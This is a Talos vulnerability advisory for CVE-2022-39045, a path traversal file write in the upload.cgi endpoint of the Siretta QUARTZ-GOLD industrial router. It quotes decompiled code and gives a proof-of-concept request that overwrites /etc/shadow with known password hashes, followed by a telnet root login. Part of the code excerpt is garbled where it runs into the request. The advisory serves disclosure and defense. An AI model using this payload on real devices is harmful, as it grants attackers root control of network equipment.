# Talos Vulnerability Report
### TALOS-2022-1611
## Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability
##### January 26, 2023
##### CVE Number
CVE-2022-39045
##### SUMMARY
A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
##### CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
##### PRODUCT URLS
QUARTZ-GOLD –
##### CVSSv3 SCORE
7.2 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
##### CWE
CWE-22 – Improper Limitation of a Pathname to a Restricted Directory (âPath Traversalâ)
##### DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.
The endpoint `upload.cgi` permits to upload a file. Following one of the functions responsible for this API:
void input_upload.cgi(char *path,int len,char *boundary)
{
[…]
remaining_length_to_write = len;
storage_udisk = nvram_get_int(“storage_udisk”);
[… calculate base_folder and perform basic checks…]
else {
[…]
filename_param = (char *)webcgi_safeget(“filename”); [1]
filename = “”;
if (filename_param != (char *)0x0) {
filename = filename_param;
}
sprintf(buff,”%s/%s”,base_folder,filename); [2]
fd = fopen(buff,”w”); [3]
if (fd == (FILE *)0x0) {
base_folder = “Unable to start pipe for mtd write”;
}
else {
[…]
boundary_len = strlen(boundary);
remaining_length_to_write = (remaining_length_to_write – 6) – boundary_len;
while (0 &filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884
–906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name=”content”; filename=”content”
root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
–906881afb7fae201f7f9962a229f9884–
If the request was successful, it is now possible to access the device using `root:admin` as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:
⯠telnet 192.168.0.1 2323
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is ‘^]’.
QUARTZ-GOLD login: root
Password:
root@QUARTZ-GOLD:/tmp/home/root#
Effectively allowing arbitrary command execution.
##### TIMELINE
2022-10-14 – Initial Vendor Contact
2022-10-20 – Vendor Disclosure
2022-11-24 – Vendor Patch Release
2023-01-26 – Public Release
##### Credit
Discovered by Francesco Benvenuto of Cisco Talos.
* * *
Vulnerability Reports Next Report
TALOS-2022-1612
Previous Report
TALOS-2022-1615Read More